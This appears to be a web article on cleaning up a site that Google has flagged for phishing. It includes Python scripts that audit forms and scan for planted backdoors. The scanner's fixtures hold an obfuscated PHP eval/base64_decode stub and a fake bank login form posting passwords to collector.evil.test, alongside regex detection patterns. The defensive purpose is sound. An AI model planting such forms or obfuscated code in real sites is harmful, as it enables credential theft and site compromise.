Most responsible website owners would never dream of creating phishing pages. Google nonetheless crawls the web looking for phishing and flags any site it believes hosts malicious pages, and some site owners wake up to a notice that their site has been flagged as a phishing portal. Honest owners often don't know what counts as phishing, so they panic and immediately ask for a review. Having your site flagged isn't the end of the world, but you do need to clean up the offending pages before a review can succeed. A successful review removes the warning from Google search results and from the browser interstitial, so it is imperative that you act fast. Here are the why, the how, and what you can do to fix a phishing flag placed on your site.
Understand What Constitutes Phishing
You might not even know that your pages are considered phishing portals. The first thing to ask yourself is which of your pages could be mistaken for one. The first red flag is a site that collects personal data but doesn't serve it over SSL/TLS. SSL (and its successor, TLS) is the protocol that encrypts traffic between your web server and the visitor's browser; you enable it by installing a certificate on the web server. With a certificate in place your site can serve pages over HTTPS, which protects submitted data against eavesdroppers and lets the browser confirm it is talking to your server rather than an impostor.
Go through your pages and identify any that ask for personal information. If a user lands on such a page over HTTP, redirect them to the HTTPS version before they enter anything private; better still, redirect every HTTP request to HTTPS so that no unencrypted copy of the form exists at all.
Another thing to look at is how you process form data. When a web form is submitted, the browser sends the fields in either a POST or a GET request. A GET request puts the fields in the URL's query string: you've probably seen page addresses with a question mark and variables appended after the page name. Query string values look like the following:
The query string is everything after the question mark. In this example, a user's first and last name are passed to a processing page. What if the query string contained a Social Security or bank account number? That is insecure: query strings are saved in browser history, recorded in web server and proxy logs, and leaked to other sites in the Referer header. Phishers are generally sloppy in how they set up their pages, so a poorly secured or poorly programmed site looks a lot like one and is more likely to be flagged.
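As an added example (not part of the original article), here is a small Python audit script that performs the page review described above mechanically: it parses the forms on each page and flags sensitive fields that are collected on a plain-HTTP page, submitted via GET (so they land in the query string), or posted to an http:// action URL. The sample pages, the example.test hostnames and the SENSITIVE_NAMES list are constructed for this example; adapt the list to the field names your own forms use.

```python
"""Audit HTML pages for forms that collect personal data insecurely.

For every <form> that contains a sensitive input, flag:
  * the page itself being served over plain http://
  * method=GET, which puts the values in the query string (browser
    history, server and proxy logs, Referer headers)
  * an action URL that submits over plain http://
The pages and hostnames below are constructed fixtures, not real sites.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Substrings that suggest personal or account data (assumed list; extend for your site).
SENSITIVE_NAMES = {"password", "passwd", "ssn", "social", "account", "card", "cvv", "dob"}


def is_sensitive(attrs):
    """True if an <input> looks like it collects personal or credential data."""
    name = (attrs.get("name") or attrs.get("id") or "").lower()
    itype = (attrs.get("type") or "text").lower()
    return itype == "password" or any(tok in name for tok in SENSITIVE_NAMES)


class FormCollector(HTMLParser):
    """Collect every form on a page with its method, action and sensitive inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {
                "method": (attrs.get("method") or "get").lower(),  # HTML default is GET
                "action": attrs.get("action") or "",
                "sensitive": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None and is_sensitive(attrs):
            self._current["sensitive"].append(attrs.get("name") or attrs.get("type"))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_page(page_url, html):
    """Return a list of (form_index, issue) findings for one page."""
    parser = FormCollector()
    parser.feed(html)
    findings = []
    for i, form in enumerate(parser.forms):
        if not form["sensitive"]:
            continue  # nothing personal collected, nothing to flag
        action_url = urljoin(page_url, form["action"])  # empty action submits to the page itself
        if urlsplit(page_url).scheme != "https":
            findings.append((i, "sensitive fields on a page served over plain HTTP"))
        if form["method"] == "get":
            findings.append((i, "sensitive fields submitted via GET (query string)"))
        if urlsplit(action_url).scheme != "https":
            findings.append((i, "form action submits over plain HTTP: " + action_url))
    return findings


# Constructed sample pages: one bad signup form, one correct login page.
SAMPLE_PAGES = {
    "http://example.test/signup.html": """
        <form action="process.php" method="get">
          <input name="firstname"><input name="lastname">
          <input name="ssn">
        </form>""",
    "https://example.test/login.html": """
        <form action="/login" method="post">
          <input name="user"><input type="password" name="pass">
        </form>
        <form action="http://example.test/search" method="get">
          <input name="q">
        </form>""",
}


def audit_all(pages=SAMPLE_PAGES):
    """Audit every page in the mapping; returns url -> findings."""
    return {url: audit_page(url, html) for url, html in pages.items()}


if __name__ == "__main__":
    for url, findings in audit_all().items():
        print(url)
        for idx, issue in findings:
            print(f"  form #{idx}: {issue}")
```

Run it over a local copy of your pages (or feed fetched HTML to audit_page) and fix every finding: switch the form to POST, serve both the page and the action URL over HTTPS, and redirect the HTTP version. The search form on the login page is deliberately not flagged: a query string is fine for data that isn't private.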
Another common, and much harder to identify, problem is a hacked site. Attackers who gain access to your server place phishing pages on your domain without your knowledge, which makes the offending page much harder to track down.
You can use a scanner that looks specifically for hacked content. For instance, AWSnap (aw-snap.info/file-viewer/) fetches the pages you point it at, highlights any suspicious code and gives you suggestions. Another tool is Sucuri (sucuri.net), which also offers a paid subscription that crawls your site automatically at a set interval and notifies you if any suspicious files are found.
If you can't find the hacked pages, you'll need to hire a professional. Google won't remove the warning until all phishing content is gone from your domain, and a partial cleanup simply fails the review. Close the hole the attacker used to get in as well (outdated software, weak or reused passwords), or the pages will reappear.
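As an added example (again not part of the original article, and not how AWSnap or Sucuri actually work), here is a Python scanner that runs a few of the same kinds of checks locally against a site's document root: obfuscated PHP, hidden iframes, forms that post captured data to a host other than your own, and files modified after a known-good baseline. The document root, hostnames and file contents are constructed fixtures written to a temporary directory, and the regular expressions are illustrative heuristics rather than a complete signature set.

```python
"""Scan a site's document root for planted phishing or backdoor files.

Heuristics used here (illustrative, not a vendor's signature set):
  * PHP files calling eval/base64_decode/gzinflate/str_rot13, the usual
    shape of an obfuscated backdoor
  * hidden iframes (display:none or zero size)
  * forms whose action posts to a host other than the site's own, the way
    a dropped phishing kit ships captured logins to its operator
  * files modified after a known-good baseline timestamp
All fixture files below are constructed for the example; they are not real malware.
"""
import os
import re
import tempfile
import time

OBFUSCATION = re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(", re.I)
HIDDEN_IFRAME = re.compile(
    r"<iframe[^>]*(display\s*:\s*none|width\s*=\s*[\"']?0\b|height\s*=\s*[\"']?0\b)", re.I)
FORM_ACTION = re.compile(r"<form[^>]*action\s*=\s*[\"']?https?://([^/\"'>\s]+)", re.I)
SCAN_EXTENSIONS = (".php", ".html", ".htm", ".js")


def scan_file(path, site_host, baseline_mtime):
    """Return the reasons this file looks suspicious (empty list if clean)."""
    reasons = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        body = fh.read()
    if path.endswith(".php") and OBFUSCATION.search(body):
        reasons.append("obfuscated PHP (eval/base64_decode chain)")
    if HIDDEN_IFRAME.search(body):
        reasons.append("hidden iframe")
    for host in FORM_ACTION.findall(body):
        if host.lower() != site_host.lower():
            reasons.append("form posts to foreign host " + host)
    if os.path.getmtime(path) > baseline_mtime:
        reasons.append("modified after baseline")
    return reasons


def scan_site(root, site_host, baseline_mtime):
    """Walk the document root; map relative path -> reasons for every flagged file."""
    flagged = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(SCAN_EXTENSIONS):
                continue
            full = os.path.join(dirpath, name)
            reasons = scan_file(full, site_host, baseline_mtime)
            if reasons:
                flagged[os.path.relpath(full, root).replace(os.sep, "/")] = reasons
    return flagged


def _write(root, rel, content, mtime=None):
    """Write a fixture file, optionally backdating its modification time."""
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w", encoding="utf-8") as fh:
        fh.write(content)
    if mtime is not None:
        os.utime(full, (mtime, mtime))
    return full


def build_fixture():
    """Create a throwaway document root: one legitimate page plus two planted files.

    Returns (root, site_host, baseline_mtime). The baseline is one day ago; the
    legitimate page is backdated before it, the planted files keep the current time.
    """
    root = tempfile.mkdtemp(prefix="siteroot-")
    baseline = time.time() - 86400
    # Legitimate contact form posting to our own host (constructed).
    _write(root, "index.html",
           '<html><body><form action="https://example.test/contact" method="post">'
           '<input name="email"></form></body></html>', mtime=baseline - 3600)
    # Obfuscated PHP dropped into an upload directory (payload is just echo "hi";).
    _write(root, "wp-content/uploads/cache.php",
           '<?php eval(base64_decode("ZWNobyAiaGkiOw==")); ?>')
    # Bank-style login page that ships credentials to an attacker's collector (constructed).
    _write(root, "secure/bank-login.html",
           '<form action="https://collector.evil.test/post.php" method="post">'
           '<input type="password" name="pass"></form>'
           '<iframe src="stats.html" style="display:none"></iframe>')
    return root, "example.test", baseline


if __name__ == "__main__":
    root, host, baseline = build_fixture()
    for rel, reasons in sorted(scan_site(root, host, baseline).items()):
        print(rel)
        for reason in reasons:
            print("  -", reason)
```

Point scan_site at your real document root with your own hostname and the timestamp of your last known-good backup; anything it flags deserves a manual look, and a file that trips several heuristics at once is almost certainly planted. The modification-time check is what catches pages the content heuristics miss, so keep a trustworthy baseline.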
On rare occasions your site might be incorrectly flagged. If so, request a review and explain why you believe the flag is wrong. Google also provides this URL for reporting incorrectly flagged sites:
You should also know that Google uses different warnings for different findings. The most common phishing notification is "Deceptive site ahead," displayed by Chrome and by Firefox (both use Google's Safe Browsing data). If Google believes you host malware, the warning instead says that the site ahead contains malware or may harm your computer.